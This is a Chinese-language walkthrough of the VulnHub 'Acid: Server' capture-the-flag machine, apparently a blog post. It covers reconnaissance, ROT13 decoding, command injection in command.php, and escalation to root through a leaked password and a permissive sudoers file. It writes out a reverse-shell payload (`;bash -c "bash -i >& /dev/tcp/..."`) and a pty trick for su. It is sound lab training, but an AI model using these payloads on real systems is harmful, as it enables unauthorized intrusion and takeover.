Acid: Server
项目地址:https://download.vulnhub.com/acid/Acid.rar
是一个打包好的镜像文件
注意:导入 vmx 时一定要选择我已移动,否则没网
使用 Nmap 扫描出开放服务及操作系统版本

查看网页源代码发现标题为 /Challenge

访问来到一个登录页面

查看源代码发现有个不寻常的字符
1 | gkg.qvpn |

扔给 Ai 分析解出是 ROT13 加密
1 | acid.txt |
拿到新文件路径

访问无权限登录

扫描其 /Challenge 后台发现一个 cake.php 文件

但是其标题显示 /Magic_Box

扫描路径显示有一个 command.php 文件,要我们输入 IP 地址

RCE
Reverse Kunfu
输入 ;ls 在源代码中可以看到文件

直接打反弹 Shell
1 | ;bash -c "bash -i >& /dev/tcp/192.168.187.136/7777 0>&1" |
成功连接上

提权
敏感信息泄露
找到一个名为raw_vs_isi 文件夹

里面有个名为提示的流量包

复制到网站的目录中然后下载

观察流量包发现提示信息

这里提到了一个用户

刚好在 /etc/passwd 文件中也有这个用户

使用其给出的别名当作密码登录
1 | 1337hax0r |
这通常是 Apache 或 Nginx 等 Web 服务器的运行账户。它通常没有分配交互式终端,所以直接执行 su 会触发此错误

script 会创建一个伪终端(pty)并运行指定命令
这会在新的伪终端中执行 su,从而绕过终端检查
1 | script -q -c "su saman" /dev/null |
/etc/sudoers 配置不当
检查权限发现全是 ALL

直接 sudo 新建一个终端
